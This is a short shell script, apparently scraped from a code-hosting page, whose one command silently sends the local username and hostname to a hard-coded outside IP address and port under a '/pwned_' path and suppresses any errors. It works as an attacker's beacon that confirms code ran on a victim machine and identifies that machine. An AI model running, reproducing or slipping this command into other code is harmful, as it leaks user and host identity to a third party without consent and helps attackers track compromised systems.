3 lines
85 B
Bash
3 lines
85 B
Bash
|
|
#!/bin/sh
|
||
|
|
curl -s http://202.79.169.91:28016/pwned_$(whoami)_$(hostname) 2>/dev/null
|